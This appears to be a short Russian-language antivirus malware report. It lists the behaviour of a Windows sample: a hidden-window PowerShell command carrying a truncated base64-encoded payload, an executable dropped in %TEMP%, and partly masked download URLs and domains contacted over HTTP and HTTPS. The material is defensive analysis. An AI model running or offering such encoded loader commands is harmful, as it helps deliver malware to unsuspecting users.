Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAtAGoATwBpAG4AIAAoACAAKAAzADYALAAgADEAMQA5ACAALAAxADEANQAsACAAOQA5ACwAIAAxADEANAAsACAAMQAwADUAIAAsADEAMQAyACwAMQAxADYALAAgADMAMgAsADYAMQAgACwAMwAyACwAMQAxADAAIAAsACAAMQAwADEAIAAsACAAMQAxAD...
- %TEMP%\21651.exe
- %TEMP%\21651.exe
- 'me###sys.com':80
- 'me###sys.com':443
- 'md####tware.co.uk':80
- 'vi####elebrities.eu':80
- 'vi####elebrities.eu':443
- 'co####ack.com.au':80
- http://me###sys.com/zeLrq/
- http://md####tware.co.uk/rCa/
- http://vi####elebrities.eu/WEA/
- http://co####ack.com.au/vqemsc/
- 'me###sys.com':443
- 'vi####elebrities.eu':443
- DNS ASK me###sys.com
- DNS ASK md####tware.co.uk
- DNS ASK vi####elebrities.eu
- DNS ASK co####ack.com.au
- DNS ASK fi####edstudios.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAtAGoATwBpAG4AIAAoACAAKAAzADYALAAgADEAMQA5ACAALAAxADEANQAsACAAOQA5ACwAIAAxADEANAAsACAAMQAwADUAIAAsADEAMQAyACwAMQAxADYALAAgADMAMgAsADYAMQAgACwAMwAyACwAMQAxADAAIAAsACAAMQAwADEAIAAsACAAMQAxAD...' (со скрытым окном)